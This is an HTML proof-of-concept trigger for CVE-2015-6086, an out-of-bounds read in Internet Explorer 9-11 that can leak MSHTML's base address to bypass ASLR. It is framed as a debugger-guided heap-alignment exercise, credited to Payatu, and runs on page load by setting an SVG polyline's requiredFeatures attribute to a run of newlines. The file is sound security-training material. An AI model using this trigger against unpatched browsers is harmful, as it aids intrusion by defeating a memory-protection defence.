<!--

                      CVE-2015-6086
             Out Of Bound Read Vulnerability
     Address Space Layout Randomization (ASLR) Bypass

Improper handling of new line and white space character caused
Out of Bound Read in CDOMStringDataList::InitFromString. This
flaw can be used to leak the base address of MSHTML.DLL and
effectively bypass Address Space Layout Randomization.

Affected Version:
        Internet Explorer 9
        Internet Explorer 10
        Internet Explorer 11

Test Bed:
        IE: 10 & 11
        KB: KB3087038
        OS: Windows 7 SP1 x86

Advisory:
        http://www.payatu.com/advisory-ie_cdomstringdatalist/
        https://technet.microsoft.com/library/security/MS15-112
        http://www.zerodayinitiative.com/advisories/ZDI-15-547/

Copyright 2016 © Payatu Technologies Pvt. Ltd.

Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
          www.nullcon.net
          www.hardwear.io
          www.null.co.in

This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
this program.  If not, see <http://www.gnu.org/licenses/>.

THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->

<!DOCTYPE html>
<html>
<head>
    <title>Exploitation Challenge 1: Heap Alignment</title>
    <meta http-equiv='Cache-Control' content='no-cache'/>
    <meta http-equiv="expires" content="0"/>
    <script>
        //
        // Exploitation Challenge 1: The first challenge is Heap Alignment
        //
        function trigger() {
            alert("Attach the debugger\nSet the break points");

            var polyLine = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');

            //
            // Try commenting out the statement one by one and examine memory
            //
            //polyLine.setAttributeNS(null, 'requiredFeatures', "\n");

            //
            // Comment the above line and uncomment comment below line and examine memory
            //
            polyLine.setAttributeNS(null, 'requiredFeatures', "\n\n\n\n\n\n\n\n\n");
        }
    </script>
</head>
<body onload='trigger();'></body>
</html>